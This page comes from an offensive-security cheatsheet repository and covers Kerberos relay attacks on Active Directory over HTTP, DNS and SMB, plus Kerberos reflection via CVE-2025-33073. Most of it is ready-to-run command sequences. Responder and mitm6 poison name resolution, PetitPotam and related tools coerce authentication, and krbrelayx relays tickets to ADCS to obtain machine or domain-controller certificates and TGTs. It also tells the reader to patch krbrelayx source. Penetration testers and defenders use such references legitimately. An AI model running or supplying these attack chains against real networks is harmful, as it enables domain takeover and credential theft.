daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

internal-relay-kerberos.md (7574B)


      1 ---
      2 title: "Internal - Kerberos Relay"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/internal-relay-kerberos.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-relay-kerberos.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Internal - Kerberos Relay
     12 
     13 ## Kerberos Relay over HTTP
     14 
     15 **Requirements**:
     16 
     17 * Kerberos authentication for services without signing
     18 
     19 HTTP through multicast poisoning (LLMNR)
     20 
     21 * An attacker sets up an LLMNR poisoner on the multicast range.
     22 * An HTTP client on the multicast range fails to resolve a hostname. This can happen because of a typo in a browser, a misconfiguration, but this can also be triggered by an attacker via WebDav coercion.
     23 * The LLMNR poisoner indicates that the hostname resolves to the attacker’s machine. In the LLMNR response, the answer name differs from the query and corresponds to an arbitrary relay target.
     24 * The victim performs a request on the attacker web server, which requires Kerberos authentication.
     25 * The victim asks for a ST with the SPN of the relay target. It then sends the resulting AP-REQ to the attacker web server.
     26 * The attacker extracts the AP-REQ and relays it to a service of the relay target.
     27 
     28 **Example**: ESC8 with Kerberos Relay
     29 
     30 ```ps1
     31 python3 Responder.py -I eth0 -N <PKI_SERVER_NETBIOS_NAME>
     32 sudo python3 krbrelayx.py --target 'http://<PKI_SERVER>.<DOMAIN.LOCAL>/certsrv/' -ip <ATTACKER_IP> --adcs --template User -debug
     33 ```
     34 
     35 ## Kerberos Relay over DNS
     36 
     37 Abuses the DNS Secure Dynamic Updates in Active Directory.
     38 
     39 * [dirkjanm/mitm6](https://github.com/dirkjanm/mitm6)
     40 * [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx)
     41 * [dirkjanm/PKINITtools](https://github.com/dirkjanm/PKINITtools)
     42 
     43 **Steps**:
     44 
     45 * The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in.
     46 * The server responds with the DNS server that is authorative, in this case the DC icorp-dc.internal.corp.
     47 * The client attempts a dynamic update on the A record with their name in the zone internal.corp.
     48 * This dynamic update is refused by the server because no authentication is provided.
     49 * The client uses a TKEY query to negotiate a secret key for authenticated queries.
     50 * The server answers with a TKEY Resource Record, which completes the authentication.
     51 * The client sends the dynamic update again, but now accompanied by a TSIG record, which is a signature using the key established in steps 5 and 6.
     52 * The server acknowledges the dynamic update. The new DNS record is now in place.
     53 
     54 ```ps1
     55 # Example - Relay to ADCS - ESC8
     56 sudo krbrelayx.py --target http://adscert.internal.corp/certsrv/ -ip 192.168.111.80 --victim icorp-w10.internal.corp --adcs --template Machine
     57 sudo mitm6 --domain internal.corp --host-allowlist icorp-w10.internal.corp --relay adscert.internal.corp -v
     58 python gettgtpkinit.py -pfx-base64 MIIRFQIBA..cut...lODSghScECP5hGFE3PXoz internal.corp/icorp-w10$ icorp-w10.ccache
     59 ```
     60 
     61 ## Kerberos Relay over SMB
     62 
     63 Abuses the way SMB clients construct SPNs when asking for a ST.
     64 
     65 * [cube0x0/KrbRelay](https://github.com/cube0x0/KrbRelay) - Framework for Kerberos relaying.
     66 * [decoder-it/KrbRelayEx-RPC](https://github.com/decoder-it/KrbRelayEx-RPC) - Kerberos Relay and Forwarder for (Fake) RPC/DCOM MiTM Server.
     67 
     68 ```ps1
     69 dnstool.py -u "DOMAIN.LOCAL\\user" -p "pass" -r "pki1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" -d "10.10.10.10" --action add "10.10.10.11" --tcp
     70 petitpotam.py -u 'user' -p 'pass' -d DOMAIN.LOCAL 'pki1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc.domain.local
     71 krbrelayx.py -t 'http://pki.domain.local/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC$'
     72 gettgtpkinit.py -cert-pfx 'DC$.pfx' 'DOMAIN.LOCAL/DC$' DC.ccache
     73 ```
     74 
     75 ## Kerberos Reflection - CVE-2025-33073
     76 
     77 Relay one machine to itself by using the `1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` trick. Also, grants local admin privilege.
     78 
     79 ![reflective-kerberos-relay-attack](https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/ReflectiveKerberosRelayAttackBlog_hu_4f4898429389ef25.webp)
     80 
     81 * Add a DNS record for `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` pointing to our IP address. It is also possible to compromise any vulnerable machine by registering `localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA`.
     82 
     83     ```ps1
     84     dnstool.py -u 'domain.local\username' -p 'P@ssw0rd' 10.10.10.10 -a add -r target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 198.51.100.27
     85     # OR
     86     pretender -i "vmnet2" --spoof "target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" --no-dhcp --no-timestamps
     87     ```
     88 
     89 * Edit `krbrelayx/lib/servers/smbrelayserver.py` and remove these lines
     90 
     91     ```ps1
     92     156: blob['tokenOid'] = '1.3.6.1.5.5.2'
     93     157: blob['innerContextToken']['mechTypes'].extend([MechType(TypesMech['KRB5 - Kerberos 5']),
     94     158:                                                MechType(TypesMech['MS KRB5 - Microsoft Kerberos 5']),
     95     159:                                                MechType(TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'])])
     96     ```
     97 
     98 * Start the relay to catch the callback from TARGET.
     99 
    100     ```ps1
    101     krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support
    102     krbrelayx.py --target smb://target.lab.redteam -c whoam
    103     ```
    104 
    105 * Trigger a callback from the server to `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` using PetitPotam.
    106 
    107     ```ps1
    108     nxc smb TARGET.domain.local -u username -p 'P@ssw0rd' -M coerce_plus -o M=Petitpotam LISTENER=target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
    109     # OR
    110     petitpotam.py -d domain.local -u username -p 'password' "TARGET1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" "TARGET.DOMAIN.LOCAL"
    111     # OR
    112     wspcoerce 'lab.redteam/user:password@target.lab.redteam' file:////target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA/path
    113     ```
    114 
    115 ## References
    116 
    117 * [A Look in the Mirror - The Reflective Kerberos Relay Attack - RedTeam Pentesting - June 11, 2025](https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/)
    118 * [Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx - Quentin Roland - January 27, 2025](https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with)
    119 * [From NTLM relay to Kerberos relay: Everything you need to know - Decoder - April 24, 2025](https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/)
    120 * [NTLM reflection is dead, long live NTLM reflection! – An in-depth analysis of CVE-2025-33073 - Wilfried Bécard and Guillaume André - June 11, 2025](https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025)
    121 * [Relaying Kerberos over DNS using krbrelayx and mitm6 - Dirk-jan Mollema - February 22, 2022](https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/)
    122 * [Relaying Kerberos over SMB using krbrelayx - Hugo Vincent - November 20, 2024](https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx)
    123 * [Using Kerberos for Authentication Relay Attacks - James Forshaw - October 20, 2021](https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html)
    124 * [Windows Exploitation Tricks: Relaying DCOM Authentication - James Forshaw - October 20, 2021](https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html)